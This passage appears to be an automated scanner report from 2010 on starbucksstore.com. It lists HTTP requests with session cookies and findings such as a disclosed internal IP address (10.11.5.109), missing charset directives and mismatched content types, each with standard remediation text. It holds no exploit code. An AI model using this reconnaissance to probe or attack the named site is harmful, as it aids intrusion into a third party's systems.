<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/products/shabotus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shabotus.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/products/shabotu ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/shourplg.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25328 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:40:37 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/products/shourplg.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shourplg.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/products/shourpl ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/shprodde.asp?SKU=317917 HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35039 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:53 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Detail Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Detail Page : 317917 : Starbucks Starbucks VIA® Ready Brew Christmas Blend at StarbucksStore.com" var s_prop3="SBP ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/shprodli.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14377 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:26 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shprodli.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/products/shprodl ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/sitemap.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21107 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:41:26 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/products/sitemap.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/sitemap.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/products/sitemap. ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /products/terms.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 15912 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:39:44 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/products/terms.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/terms.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/products/terms.asp" ...[SNIP]...
<meta HTTP-EQUIV="Conten ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Starbucks at Home HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks at Home HomePage" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-co ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /starbucks-coffee-tours/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16772 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:05 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Starbucks Tours Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Tours Page" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-t ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /starbucks-gifts/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 17195 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:19 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Starbucks Gift Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Gift Page" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gifts/def ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79402 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:24 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="Search Listing: Internal: " var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-seasonal/s ...[SNIP]...
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET /aff/adredir.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:48 GMT Connection: close Content-Length: 75
The page cannot be displayed because an internal server error has occurred.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /aff/adredir.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:48 GMT Connection: close Content-Length: 75
The page cannot be displayed because an internal server error has occurred.
Report generated by XSS.CX at Wed Nov 17 06:58:46 CST 2010.